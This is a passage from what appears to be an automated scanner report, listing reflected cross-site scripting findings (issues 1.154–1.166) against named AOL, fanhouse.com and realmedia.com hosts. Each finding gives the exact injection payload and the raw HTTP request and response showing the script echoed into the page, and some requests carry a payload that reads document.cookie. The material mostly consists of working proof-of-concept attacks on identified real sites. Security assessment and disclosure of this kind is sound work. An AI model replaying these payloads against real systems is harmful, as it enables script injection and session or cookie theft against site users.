User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:32 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:38:32 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' D
...[SNIP]...

1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marlothomas.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af7"><script>alert(1)</script>fb0308338b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?58af7"><script>alert(1)</script>fb0308338b0=1 HTTP/1.1
Host: marlothomas.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:49 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Mon, 07-Feb-2011 20:22:49 GMT; path=/
Keep-Alive: timeout=5, max=999824
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 58041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://marlothomas.aol.com/?58af7"><script>alert(1)</script>fb0308338b0=1" />
...[SNIP]...

1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 885e5"-alert(1)-"db05883e06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?885e5"-alert(1)-"db05883e06a=1 HTTP/1.1
Host: mlb.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:22:58 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999768
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 91018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="MLB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://mlb.fanhouse.com/?885e5"-alert(1)-"db05883e06a=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.156. http://money.aol.com/reflector/setCookie [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.aol.com
Path:   /reflector/setCookie

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 54f8b<script>alert(1)</script>5358b4f3ab0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reflector/setCookie?cb=54f8b<script>alert(1)</script>5358b4f3ab0& HTTP/1.1
Host: money.aol.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/os/money/flash/DailyFinanceCookieProxy.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:20 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 45

54f8b<script>alert(1)</script>5358b4f3ab0({})

1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://motorsports.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54b2"-alert(1)-"03ff745aee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b54b2"-alert(1)-"03ff745aee2=1 HTTP/1.1
Host: motorsports.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:06 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999880
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
afighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="Motorsports";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://motorsports.fanhouse.com/?b54b2"-alert(1)-"03ff745aee2=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.158. http://movies.aol.com/trailers/main.adp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://movies.aol.com
Path:   /trailers/main.adp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3a"%3b1a4d966ae1a was submitted in the REST URL parameter 1. This input was echoed as fce3a";1a4d966ae1a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trailersfce3a"%3b1a4d966ae1a/main.adp HTTP/1.1
Host: movies.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.1997950285.1031800576; path=/
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:23:09 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 44419
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head
...[SNIP]...
<!--
s_265.server="acp-ld29.websys.aol.com";
s_265.mmxgo=true;
s_265.pageName="mov: Page Not Found!";
s_265.channel="us.movies";
s_265.trackExternalLinks="true";
s_265.prop1="trailersfce3a";1a4d966ae1a";
s_265.pfxID="mov";
s_265.disablepihost=false;
s_265.prop2="main.adp";
s_265.linkInternalFilters="javascript:,aol.com,moviefone.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nba.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eec"-alert(1)-"5808854bd27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?c0eec"-alert(1)-"5808854bd27=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999935
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 87524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NBA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nba.fanhouse.com/?c0eec"-alert(1)-"5808854bd27=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ncaabasketball.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6117e"-alert(1)-"46f14e1380e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6117e"-alert(1)-"46f14e1380e=1 HTTP/1.1
Host: ncaabasketball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:16 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999592
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NCAABB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://ncaabasketball.fanhouse.com/?6117e"-alert(1)-"46f14e1380e=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ncaafootball.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a90"-alert(1)-"2a24bc7b009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?11a90"-alert(1)-"2a24bc7b009=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 76025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
m,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NCAAFB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://ncaafootball.fanhouse.com/?11a90"-alert(1)-"2a24bc7b009=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.162. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79615"><script>alert(1)</script>45b412626c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:39 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/403581089/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=500101500015500001101" target="_top">
...[SNIP]...

1.163. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d5e"><script>alert(1)</script>1a204efbd96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:41 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/L18/1519301022/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1519301022" TARGET=_blank>

1.164. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb47"><script>alert(1)</script>3d74b029401 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom32cb47"><script>alert(1)</script>3d74b029401?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:44 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/487386772/Bottom32cb47"><script>alert(1)</script>3d74b029401/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=500101500015500001101" target="_top">
...[SNIP]...

1.165. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [_RM_HTML_MM_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b2b"-alert(1)-"6894311a107 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=50010150001550000110183b2b"-alert(1)-"6894311a107 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:37 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PmBY9O10M69; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:37 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "50010150001550000110183b2b"-alert(1)-"6894311a107";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2009/06/01/long-weekend-getaways-within-the-united-states/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d5c"><script>alert(1)</script>a72c54c0017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:18 GMT; path=/
Keep-Alive: timeout=5, max=999688
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 89596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1" />
...[SNIP]...

